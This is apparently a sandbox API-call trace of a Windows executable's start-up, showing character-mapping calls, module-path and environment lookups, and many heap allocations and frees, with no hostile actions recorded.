lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0092.791] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0092.791] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0092.791] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1000) returned 0x4970d0 [0092.792] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0092.792] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0092.792] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0092.792] AreFileApisANSI () returned 1 [0092.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0092.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0092.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xc5) returned 0x4843e0 [0092.792] GetEnvironmentStringsW () returned 0x4980e0* [0092.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0092.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x4e6) returned 0x498ac0 [0092.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x498ac0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0092.792] FreeEnvironmentStringsW (penv=0x4980e0) returned 1 [0092.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x118) returned 0x48a450 [0092.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1f) returned 0x48b300 [0092.792] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x4898d0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x484f80 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x490070 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x484fc0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x14) returned 0x489c00 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b6f0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd) returned 0x484070 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1d) returned 0x48b780 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x31) returned 0x485000 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x15) returned 0x485040 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x17) returned 0x4825e0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe) returned 0x483ea0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x69) returned 0x483ec0 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3e) returned 0x490750 [0092.793] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1d) returned 0x48b240 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x48) returned 0x490520 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x483f40 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x18) returned 0x483f60 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1b) returned 0x48b480 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48b840 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x29) returned 0x4985f0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48b4e0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x6b) returned 0x48ba00 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x17) returned 0x48ba80 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xf) returned 0x48baa0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x16) returned 0x48bac0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2a) returned 0x498130 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x29) returned 0x4981f0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x499100 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x21) returned 0x48b870 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x16) returned 0x4990e0 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x22) returned 0x48b540 [0092.794] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x12) returned 0x4990a0 [0092.794] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x498ac0 | out: hHeap=0x480000) returned 1 [0092.795] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3a7) returned 0x4993c0 [0092.796] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b8d0 [0092.796] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3a7) returned 0x4a3770 [0092.797] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.797] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xfef7) returned 0x4adb20 [0092.989] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x490c50 [0092.989] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xfef7) returned 0x4bda20 [0092.991] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b8d0 | out: hHeap=0x480000) returned 1 [0092.991] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4adb20 | out: hHeap=0x480000) returned 1 [0092.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x450) returned 0x4988f0 [0092.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x450) returned 0x4cd920 [0092.992] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1ea7) returned 0x4cdd80 [0092.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xf40) returned 0x4993c0 [0092.993] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x7a0) returned 0x49a310 [0092.993] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdd80 | out: hHeap=0x480000) returned 1 [0092.993] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.993] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xbf0) returned 0x4993c0 [0092.993] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49a310 | out: hHeap=0x480000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x640) returned 0x4988f0 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1247) returned 0x4cd920 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x520) returned 0x4988f0 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1b56) returned 0x4993c0 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8a0) returned 0x4cd920 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x28ed) returned 0x49af20 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x550) returned 0x4988f0 [0092.994] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2537) returned 0x4cd920 [0092.994] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x12b7) returned 0x4993c0 [0092.995] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x950) returned 0x49d820 [0092.995] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.995] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x3d4f) returned 0x49e180 [0092.996] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49af20 | out: hHeap=0x480000) returned 1 [0092.996] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49d820 | out: hHeap=0x480000) returned 1 [0092.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2377) returned 0x4cd920 [0092.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x11d7) returned 0x4a1ee0 [0092.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8e0) returned 0x4993c0 [0092.996] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.996] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4a1ee0 | out: hHeap=0x480000) returned 1 [0092.996] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5b0) returned 0x4988f0 [0092.997] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x640) returned 0x4988f0 [0092.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5be2) returned 0x4adb20 [0092.997] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x49e180 | out: hHeap=0x480000) returned 1 [0092.997] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x890) returned 0x4cd920 [0092.997] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xac0) returned 0x4cd920 [0092.998] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b8d0 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x960) returned 0x4cd920 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x960) returned 0x4ce290 [0092.998] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x460) returned 0x4988f0 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe0f) returned 0x4cec00 [0092.998] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ce290 | out: hHeap=0x480000) returned 1 [0092.998] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1c17) returned 0x4b3710 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe00) returned 0x4cd920 [0092.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x700) returned 0x4b5330 [0092.999] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3710 | out: hHeap=0x480000) returned 1 [0092.999] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x153d) returned 0x4b3710 [0092.999] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cec00 | out: hHeap=0x480000) returned 1 [0092.999] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b5330 | out: hHeap=0x480000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2277) returned 0x4cd920 [0092.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1157) returned 0x4b4c60 [0092.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8a0) returned 0x4b5dc0 [0092.999] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b4c60 | out: hHeap=0x480000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1fc7) returned 0x4cd920 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3710 | out: hHeap=0x480000) returned 1 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b5dc0 | out: hHeap=0x480000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1657) returned 0x4b3710 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xb20) returned 0x4b4d70 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x590) returned 0x4988f0 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3710 | out: hHeap=0x480000) returned 1 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b4d70 | out: hHeap=0x480000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2f96) returned 0x4b3710 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.000] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2b47) returned 0x4b66b0 [0093.001] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x15b7) returned 0x4cd920 [0093.003] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xad0) returned 0x4ceee0 [0093.003] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b66b0 | out: hHeap=0x480000) returned 1 [0093.003] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.003] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ceee0 | out: hHeap=0x480000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2697) returned 0x4cd920 [0093.003] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1367) returned 0x4b66b0 [0093.003] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9a0) returned 0x4b7a20 [0093.004] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.004] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b66b0 | out: hHeap=0x480000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x474d) returned 0x4b83d0 [0093.004] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3710 | out: hHeap=0x480000) returned 1 [0093.004] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b7a20 | out: hHeap=0x480000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x920) returned 0x4bcb30 [0093.004] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4bcb30 | out: hHeap=0x480000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1b47) returned 0x4cd920 [0093.004] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xd90) returned 0x4bcb30 [0093.005] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x6d0) returned 0x4cf470 [0093.005] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.005] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4bcb30 | out: hHeap=0x480000) returned 1 [0093.005] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf470 | out: hHeap=0x480000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5d0) returned 0x4988f0 [0093.005] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x6adf) returned 0x4993c0 [0093.005] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b83d0 | out: hHeap=0x480000) returned 1 [0093.005] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1887) returned 0x4cd920 [0093.005] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xc30) returned 0x4cf1b0 [0093.006] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x620) returned 0x4988f0 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf1b0 | out: hHeap=0x480000) returned 1 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8f0) returned 0x4cd920 [0093.006] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x480) returned 0x4988f0 [0093.006] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x240) returned 0x4ce220 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4988f0 | out: hHeap=0x480000) returned 1 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ce220 | out: hHeap=0x480000) returned 1 [0093.006] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x490840 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b8d0 | out: hHeap=0x480000) returned 1 [0093.006] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4adb20 | out: hHeap=0x480000) returned 1 [0093.007] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0093.007] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x490840 | out: hHeap=0x480000) returned 1 [0093.007] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9900) returned 0x4993c0 [0093.008] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bf0) returned 0x4cd920 [0093.010] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.010] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9937) returned 0x4adb20 [0093.011] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0093.011] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48b720 [0093.011] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9900) returned 0x4993c0 [0093.011] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bf0) returned 0x4cd920 [0093.012] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cd920 | out: hHeap=0x480000) returned 1 [0093.012] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9937) returned 0x4cd920 [0093.013] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4993c0 | out: hHeap=0x480000) returned 1 [0093.013] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x490340 [0093.013] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b720 | out: hHeap=0x480000) returned 1 [0093.013] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4a3770 | out: hHeap=0x480000) returned 1 [0093.014] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4bda20 | out: hHeap=0x480000) returned 1 [0093.014] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x490c50 | out: hHeap=0x480000) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4993c0 [0093.015] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4b7460 